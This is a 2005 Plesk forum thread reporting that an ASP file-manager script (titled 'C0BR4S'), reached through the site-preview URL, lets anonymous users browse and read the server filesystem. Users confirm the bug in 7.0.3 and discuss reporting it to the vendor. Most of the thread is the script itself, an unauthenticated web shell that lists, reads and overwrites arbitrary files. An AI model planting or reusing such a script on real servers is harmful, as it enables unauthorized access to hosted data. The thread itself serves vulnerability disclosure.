
Site before propagate: BUG SECURITY ?

Discussion in 'Plesk for Windows - 8.x and Older' started by DanivalBrazil, Mar 4, 2005.

  1. DanivalBrazil

    DanivalBrazil Guest

    0
     
    Hi!

    Copy the ASP script below and paste it into a file (index.asp). Then access it by IP address, like: http://xx.xx.xx.xx/your-domain.com/index.asp .


    Code:
    <%@ language="vbscript" %>
    <% Option Explicit %>
    <object runat="server" scope="page" id="fsoEdit"
    progid="Scripting.FileSystemObject">
    </object>
    
    <%
    	' Icon image names: one for folders, one for files whose extension has no icon.
    	Const STR_DIR_GIF = "se_folder.gif", STR_UNK_GIF = "se_unknown.gif"

    	' Listing detail levels accepted by ShowDirList (only DET_NAME is handled there).
    	Const DET_NAME = 0, DET_SIZE = 1, DET_DATE = 2

    	' Number of table cells per row in the name-only listing.
    	Const DET_NAME_COLS = 3

    	' strSERoot   - physical directory that the virtual root "/" maps to.
    	' strSEScript - URL path of this page; used for the self-referencing links
    	'               and for the edit form's action.
    	Dim strSERoot, strSEScript
    	strSERoot = Server.MapPath("/")
    	strSEScript = Request.ServerVariables("SCRIPT_NAME")
    
    	' Returns the request parameter strName, preferring the POSTed form value
    	' and falling back to the query string. The value is returned exactly as
    	' the client sent it; no validation or normalisation happens here.
    	Function GetParm(strName)
    		If Not IsEmpty(Request.Form(strName)) Then
    			GetParm = Request.Form(strName)
    		Else
    			GetParm = Request.QueryString(strName)
    		End If
    	End Function
    	
    	' Picks the icon file for strFName: "se_<extension>.gif" when that image
    	' exists directly under strSERoot, otherwise the generic STR_UNK_GIF.
    	Function GetFileGIFName(strFName)
    		Dim strIcon
    		strIcon = "se_" + Trim(fsoEdit.GetExtensionName(strFName)) + ".gif"

    		' Start from the fallback and override only when the specific icon is present.
    		GetFileGIFName = STR_UNK_GIF
    		If fsoEdit.FileExists(strSERoot + "\" + strIcon) Then
    			GetFileGIFName = strIcon
    		End If
    	End Function
    	
    	' Returns a 16x16 <img> tag whose src attribute is strFName.
    	' strFName is inserted as given; it is not escaped here.
    	Function MakeIconImg(strFName)
    		Dim strOpen, strClose
    		strOpen = "<img height=""16"" width=""16"" src="""
    		strClose = """>"
    		MakeIconImg = strOpen + strFName + strClose
    	End Function
    
    	' Reports whether fileCur (a FileSystemObject File) has one of the
    	' extensions this page treats as editable text.
    	' The comparison is exact, so only the spellings listed below match
    	' (for example "asp" and "ASP", but not "Asp").
    	Function CanEdit(fileCur)
    		Dim strExt, strKnown
    		strExt = fsoEdit.GetExtensionName(fileCur.Name)

    		CanEdit = False
    		For Each strKnown In Array("asp", "inc", "txt", "html", "htm", "shtml", "cgi", "asa", "pl", "shtm", "php", "ASP", "PHP", "sql", "aspx", "ASPX")
    			If strExt = strKnown Then
    				CanEdit = True
    				Exit For
    			End If
    		Next
    	End Function
    
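    	' Builds an anchor back to this page that lists a directory.
    	'   fld    - FileSystemObject Folder (or File) the link is relative to.
    	'   strDir - ".." for fld's parent, otherwise the name of a child of fld.
    	' The target path travels in the CWD query parameter (URL-encoded). The
    	' link text is HTML-encoded so that a name containing characters such as
    	' "&" cannot change the markup of the listing page.
    	Function MakeDirLink(fld, strDir)
    		Dim strTarget
    		If strDir = ".." Then
    			strTarget = Server.URLEncode(fld.ParentFolder)
    		Else
    			strTarget = Server.URLEncode(fsoEdit.BuildPath(fld.Path, strDir))
    		End If

    		MakeDirLink = "<a href=""" + strSEScript + "?CWD=" + strTarget + """>" + Server.HTMLEncode(strDir) + "</a>"
    	End Function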
    	
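    	' Returns the listing entry for fileCur (a FileSystemObject File).
    	' Editable files (see CanEdit) become a link to this page with the full
    	' path in the File query parameter; other files are shown as plain text.
    	' The displayed name is HTML-encoded in both cases so that a file name
    	' cannot change the markup of the listing page.
    	Function MakeFileLink(fileCur)
    		Dim strLabel
    		strLabel = Server.HTMLEncode(fileCur.Name)

    		If CanEdit(fileCur) Then
    			MakeFileLink = "<a href=""" + strSEScript + "?File=" + Server.URLEncode(fileCur.Path) + """>" + strLabel + "</a>"
    		Else
    			MakeFileLink = strLabel
    		End If
    	End Function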
    	
    	' Renders the contents of strPath as HTML table rows and returns them.
    	' A ".." row comes first unless the folder reports IsRootFolder, then the
    	' sub-folders, then the files, DET_NAME_COLS cells per row. Cells are only
    	' produced when iDetail = DET_NAME; no other detail level is handled.
    	' strPath is handed to GetFolder exactly as received: nothing in this
    	' function restricts it to the site root.
    	Function ShowDirList(strPath, iDetail)
    		Dim fld, strOut, iCur, dirCur, fileCur, strCell

    		Set fld = fsoEdit.GetFolder(strPath)
    		strOut = ""
    		iCur = 0

    		If Not fld.IsRootFolder Then
    			strOut = "<tr><td>" + MakeIconImg(STR_DIR_GIF) + "&nbsp;" + MakeDirLink(fld, "..") + "</td></tr>" + vbCR
    		End If

    		' Sub-folders first.
    		For Each dirCur In fld.SubFolders
    			If iDetail = DET_NAME Then
    				strCell = "<td>" + MakeIconImg(STR_DIR_GIF) + "&nbsp;" + MakeDirLink(fld, dirCur.Name) + "</td>"
    				If strOut = "" Then strOut = "<tr>"
    				strOut = strOut + strCell
    				iCur = iCur + 1
    				' Close the row and open the next one after every DET_NAME_COLS cells.
    				If iCur Mod DET_NAME_COLS = 0 Then strOut = strOut + "</tr>" + vbCR + "<tr>"
    			End If
    		Next

    		' Then files, continuing the same cell counter.
    		For Each fileCur In fld.Files
    			If iDetail = DET_NAME Then
    				strCell = "<td>" + MakeIconImg(GetFileGIFName(fileCur.Name)) + "&nbsp;" + MakeFileLink(fileCur) + "</td>"
    				If strOut = "" Then strOut = "<tr>"
    				strOut = strOut + strCell
    				iCur = iCur + 1
    				If iCur Mod DET_NAME_COLS = 0 Then strOut = strOut + "</tr>" + vbCR + "<tr>"
    			End If
    		Next

    		' Terminate whatever row is still open.
    		If strOut <> "" Then
    			strOut = strOut + "</tr>" + vbCR
    		End If

    		ShowDirList = strOut
    	End Function
    
    	' Moves strFName aside to "<strFName>.BAK", replacing any earlier backup.
    	' Does nothing when strFName does not exist. After a successful call the
    	' original path no longer exists; only the .BAK copy remains.
    	Sub BackupFile(strFName)
    		Dim strBFName
    		strBFName = strFName + ".BAK"

    		If fsoEdit.FileExists(strFName) Then
    			' Drop a stale backup first, then copy and remove the original.
    			If fsoEdit.FileExists(strBFName) Then fsoEdit.DeleteFile strBFName, True
    			fsoEdit.CopyFile strFName, strBFName, True
    			fsoEdit.DeleteFile strFName, True
    		End If
    	End Sub
    	
    	' Creates (or overwrites) strFName and writes strText into it.
    	' Neither the path nor the content is checked here; callers pass request
    	' values straight through.
    	Sub SaveTextFile(strFName, strText)
    		With fsoEdit.CreateTextFile(strFName, True)
    			.Write strText
    			.Close
    		End With
    	End Sub
    	
    	' ---- Request handling -------------------------------------------------
    	' Every path used below ("File", "CWD", "OrgFName") is read verbatim from
    	' the request through GetParm. Nothing in this script authenticates the
    	' caller or checks that a path stays under strSERoot, so what the page can
    	' read or write is bounded only by the filesystem permissions of the
    	' account the page executes as.
    	' NOTE(review): containment therefore has to come from the host, e.g. a
    	' separate low-privilege identity per site with ACLs limited to that
    	' site's directory - confirm how the hosting platform sets this up.
    	Dim strFName
    	strFName = GetParm("File")
    	
    	' True once an existing file has been selected for editing.
    	Dim fEditing
    	fEditing = False
    	
    	' File object for the file being edited (set only when fEditing is True).
    	Dim fileEdit
    	
    	Dim strAct
    	strAct = GetParm("btnAction")
    	If Not IsEmpty(strAct) Then
    		' strOFName is the file's previous full path; it differs from strFName
    		' when the name field in the form was changed.
    		Dim strOFName
    		
    		If IsEmpty(GetParm("OrgFName")) Then
    			strOFName = strFName
    		Else
    			strOFName = fsoEdit.BuildPath(GetParm("CWD"), GetParm("OrgFName"))			
    		End If
    		
    		' With a CWD present, "File" is treated as a name relative to it.
    		If Not IsEmpty(GetParm("CWD")) Then
    			strFName = fsoEdit.BuildPath(GetParm("CWD"), strFName)
    		End If
    					
    		' Dispatch on the submitted btnAction value.
    		Select Case strAct
    		Case "Save"
    			If strOFName <> strFName Then
    				' rename operation
    				If fsoEdit.FileExists(strOFName) Then
    					BackupFile strOFName
    					fsoEdit.DeleteFile strOFName
    				End If
    			End If
    			' Keep a .BAK of the target, then write the submitted text to it.
    			BackupFile strFName
    			SaveTextFile strFName, GetParm("txtEdit")
    		Case "Save As"
    			BackupFile strFName
    			SaveTextFile strFName, GetParm("txtEdit")
    		Case "Delete"
    			' No statements: this branch performs no action.
    		End Select
    	End If
    			
    	' Switch to edit mode only when the requested file exists; otherwise
    	' forget the name and fall back to a directory listing.
    	If Not IsEmpty(strFName) Then
    		If fsoEdit.FileExists(strFName) Then
    			fEditing = True
    			Set fileEdit = fsoEdit.GetFile(strFName)
    		Else
    			strFName = Empty
    		End If
    	End If
    	
    	' Directory to list: the CWD parameter if given, else the folder of the
    	' selected file, else the site root.
    	Dim strCWD
    	
    	strCWD = GetParm("CWD")
    	If IsEmpty(strCWD) Then
    		If Not IsEmpty(strFName) Then
    			strCWD = fsoEdit.GetParentFolderName(strFName)
    		Else
    			strCWD = strSERoot
    		End If
    	End If
    %>
    
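    <html>
    
    <head>
    <title>C0BR4S - <%=Server.HTMLEncode(strCWD)%></title>
    </head>
    <body>
    <h1>Editar Site</h1>
    <%
    	' Page body: a directory listing when no file is selected, otherwise an
    	' edit form for the selected file.
    	' strCWD can come straight from the request and file/folder names come
    	' from the filesystem, so each is HTML-encoded where it is written into
    	' the page; otherwise a crafted value could inject markup.
    	If Not fEditing Then
    %>
    <h3>Diret&oacute;rio <%=Server.HTMLEncode(strCWD)%></h3>
    <table>
    <%=ShowDirList(strCWD, DET_NAME)%>
    </table>
    <%
    	Else
    %>
    <form method="post" action="<%=Server.HTMLEncode(strSEScript)%>">
    <input type="hidden" name="CWD" value="<%=Server.HTMLEncode(fileEdit.ParentFolder.Path)%>">
    <input type="hidden" name="OrgFName" value="<%=Server.HTMLEncode(fileEdit.Name)%>">
      <h3>Arquivo 
        <input type="text" name="File" value="<%=Server.HTMLEncode(fileEdit.Name)%>"></h3>
    <p><%=MakeIconImg(STR_DIR_GIF)%>&nbsp;<%=MakeDirLink(fileEdit, "..")%></p>
    <table border="1">
    	<tr>
    		<td><textarea cols="80" rows="20" name="txtEdit"><%
    	' Stream the file into the textarea line by line, HTML-encoding each line
    	' so the file's own markup is shown as text instead of being rendered.
    	Dim ts
    	Set ts = fileEdit.OpenAsTextStream()
    	Dim strLine
    	
    	While Not ts.AtEndOfStream
    		strLine = ts.ReadLine
    		Response.Write Server.HTMLEncode(strLine) + vbCr
    	Wend
    	
    	ts.Close
    	Set ts = Nothing
    %></textarea></td>
    	</tr>
    	<tr>
    		<td>
            <input type="submit" name="btnAction" value="Salvar">
            &nbsp;
            <input type="submit" name="btnAction" value="Salvar como">
            &nbsp;
            <input type="submit" name="btnAction" value="Apagar">
            &nbsp;<input type="reset" name="btnAction"></td>
    	</tr>
    </table>
    </form>
    <%
    	End If
    %>
    </body>
    </html>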
    
    
    
    You can browse the server with it!!!

    How do I fix it???



    Danival - from Brazil
     
  2. ColorPrint

    ColorPrint Guest

    0
     
    I think your permissions are wrong...
    With this script I can browse only the domain, not the server.
     
  3. Mertz

    Mertz Guest

    0
     
    I see the problem, and maybe I can help explain it in English.

    If you put this file into a domain's httpdocs directory then view the file through the Site Preview tool, you can use the posted ASP script to delve down into the filesystem of the server itself.

    I put this on our test server and was able to navigate down to the root of the partition I have Plesk and the customer domains on. I could read files that an anonymous user had absolutely no business reading.

    And I did it all through an anonymous connection.

    Next I plan on testing this with Plesk 7.5. I'll report here if I find that the problem carries over.

    Thank you for discovering this Danival. I'm going to report this to SW-Soft today along with another exploit I found in Plesk 7.5. I'm not going to go into that one though since I believe disclosing exploits should be done to the software vendor first before giving it to the general public.
     
  4. Mertz

    Mertz Guest

    0
     
    I just tested and this does not affect Plesk 7.5.
     
  5. DanivalBrazil

    DanivalBrazil Guest

    0
     
    Thanks Mertz,

    It is a bug in 7.03 only. I hope for a bugfix for this version, because 7.5 has a lot of bugs...

    Thanks for the explanation, my English is horrible...
     